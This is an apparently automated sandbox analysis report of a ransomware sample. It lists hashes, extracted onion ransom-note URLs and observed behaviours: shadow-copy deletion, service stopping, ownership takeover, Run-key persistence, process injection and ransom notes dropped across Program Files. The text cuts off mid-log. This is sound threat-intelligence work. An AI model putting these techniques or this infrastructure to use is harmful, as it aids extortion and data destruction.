Analysis
-
max time kernel
154s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
24-11-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Resource
win10-20220812-en
General
-
Target
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
-
Size
7KB
-
MD5
6cb1d245920799a1cc2dd8ee69e052d8
-
SHA1
29ff603adab927d52c4e9ec2746857ae26bdccc0
-
SHA256
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3
-
SHA512
3d71f7380502281fd05bb57098bddc506b000c41b1ff89572282709f0dbc2b508d2e75d2157c4562ea2f6b8e9eea42006c01d8002ba142387865856ac7c52d99
-
SSDEEP
192:B/wgnOh5hs9+w226iGrk3wi3OV5Yi3zMWu3Wg:B/wgnx9+wAKwi3OVGi3zMWu3W
Malware Config
Extracted
C:\FILE RECOVERY.txt
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 18 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 4856 takeown.exe 4368 takeown.exe 4880 takeown.exe 5084 takeown.exe 524 takeown.exe 4900 takeown.exe 4232 takeown.exe 744 takeown.exe 4396 takeown.exe 2232 takeown.exe 5088 takeown.exe 4312 takeown.exe 1824 takeown.exe 4160 takeown.exe 1332 takeown.exe 2196 takeown.exe 2360 takeown.exe 2396 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Avbvlox = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tntljlcbp\\Avbvlox.exe\"" 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription ioc process File opened (read-only) \??\P: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\S: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\U: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\X: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\Z: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\A: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\H: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\I: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\J: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\O: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\Y: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\T: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\V: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\E: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\G: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\K: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\L: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\M: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\R: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\B: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\F: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\N: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\Q: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened (read-only) \??\W: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription pid process target process PID 2124 set thread context of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -
Drops file in Program Files directory 64 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription ioc process File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-ul-oob.xrm-ms 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\VideoLAN\VLC\locale\de\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ar-ae\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSQRY32.CHM 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_w1\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ppd.xrm-ms 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\VideoLAN\VLC\plugins\logger\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-pl.xrm-ms 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files\VideoLAN\VLC\plugins\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\FILE RECOVERY.txt 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4240 sc.exe 4840 sc.exe 4504 sc.exe 4392 sc.exe 2428 sc.exe 2248 sc.exe 4024 sc.exe 3284 sc.exe 4580 sc.exe 2616 sc.exe 3444 sc.exe 2928 sc.exe 3360 sc.exe 1944 sc.exe 3316 sc.exe 4736 sc.exe 2516 sc.exe 4160 sc.exe 4428 sc.exe 4880 sc.exe 4508 sc.exe 5088 sc.exe 2224 sc.exe 4820 sc.exe 3196 sc.exe 1508 sc.exe 4960 sc.exe 2884 sc.exe 4808 sc.exe 5012 sc.exe 2016 sc.exe 2692 sc.exe 1280 sc.exe 4404 sc.exe 920 sc.exe 4688 sc.exe 4044 sc.exe 4248 sc.exe 2176 sc.exe 4952 sc.exe 2204 sc.exe 1584 sc.exe 1980 sc.exe 4232 sc.exe 204 sc.exe 4692 sc.exe 4656 sc.exe 4376 sc.exe 2664 sc.exe 4896 sc.exe 2196 sc.exe 3848 sc.exe 4344 sc.exe 3304 sc.exe 3492 sc.exe 2036 sc.exe 408 sc.exe 5112 sc.exe 1580 sc.exe 4596 sc.exe 1008 sc.exe 2640 sc.exe 3260 sc.exe 4488 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 760 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exepid process 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exetakeown.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe Token: SeTakeOwnershipPrivilege 4160 takeown.exe Token: SeTakeOwnershipPrivilege 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe Token: SeDebugPrivilege 5036 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe Token: SeBackupPrivilege 2404 vssvc.exe Token: SeRestorePrivilege 2404 vssvc.exe Token: SeAuditPrivilege 2404 vssvc.exe Token: SeTakeOwnershipPrivilege 4396 takeown.exe Token: SeTakeOwnershipPrivilege 1332 takeown.exe Token: SeTakeOwnershipPrivilege 4856 takeown.exe Token: SeTakeOwnershipPrivilege 4880 takeown.exe Token: SeTakeOwnershipPrivilege 4312 takeown.exe Token: SeTakeOwnershipPrivilege 5084 takeown.exe Token: SeTakeOwnershipPrivilege 2396 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.execmd.exe22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exedescription pid process target process PID 2124 wrote to memory of 1184 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 2124 wrote to memory of 1184 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 2124 wrote to memory of 1184 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe cmd.exe PID 1184 wrote to memory of 4952 1184 cmd.exe reg.exe PID 1184 wrote to memory of 4952 1184 cmd.exe reg.exe PID 1184 wrote to memory of 4952 1184 cmd.exe reg.exe PID 1184 wrote to memory of 4160 1184 cmd.exe takeown.exe PID 1184 wrote to memory of 4160 1184 cmd.exe takeown.exe PID 1184 wrote to memory of 4160 1184 cmd.exe takeown.exe PID 2124 wrote to memory of 3212 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 3212 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 3212 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 4984 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 4984 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 4984 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe PID 2124 wrote to memory of 5036 2124 